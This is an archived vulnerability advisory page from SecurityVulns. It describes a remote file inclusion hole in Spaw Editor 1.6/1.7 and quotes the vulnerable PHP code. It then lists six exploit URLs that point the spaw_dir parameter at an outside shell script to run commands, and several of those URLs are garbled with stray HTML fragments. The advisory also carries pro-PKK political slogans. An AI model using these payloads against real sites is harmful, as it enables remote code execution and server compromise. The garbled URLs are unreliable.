Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [SA21543] mail f/w system Mail Header Injection Vulnerability

  [SA21604] Drupal E-commerce Module Script Insertion Vulnerabilities

  [SA21603] Drupal Easylinks Module Script Insertion and SQL Injection

  [SA21584] Empire CMS "check_path"
File Inclusion Vulnerability

From:botan_(at)_linuxmail.org <botan_(at)_linuxmail.org>
Date:21 августа 2006 г.
Subject:[Kurdish Security # 23] Spaw Editor Remote Include Vulnerability

* Kurdish Security Advisory
* Spaw Editor Remote Include Vulnerability
* Our Party is PKK, Our Army HPG, We will Earn
* contact ? : irc.gigachat.net #kurdhack & [email protected]
* Risk : High
* Class : Remote
* Script : Spaw Editor
* Version : v1.6 and v1.7
* Site :  www.solmetra.com

<?
// include wysiwyg config
include '../config/spaw_control.config.php';
include $spaw_root.'class/lang.class.php';

$theme = empty($HTTP_GET_VARS['theme'])?$spaw_default_theme:
$HTTP_GET_VARS['theme'];
$theme_path = $spaw_dir.'lib/themes/'.$theme.'/';

$l = new SPAW_Lang($HTTP_GET_VARS['lang']);
$l->setBlock('colorpicker');
?>

http://site.com/[path]/dialogs/a.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/collorpicker.phpspaw_dir=ass="fixed">http://www.shell.txt&cmd=id
http://site.com/[path]/dialogs/img.php?spaw_dir=="fixed">http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/img_library.php?spaw_dir=lass="fixed">http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/table.php?spaw_dir=lass="fixed">http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/td.php?spaw_dir=http://www.shell.txt?&cmd=id

Speacial MSG! : The Turk state is the aggressor behavior Don't stay quite. Hear the Kurdish people is scream be late.. Stop the Turkey Military!

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород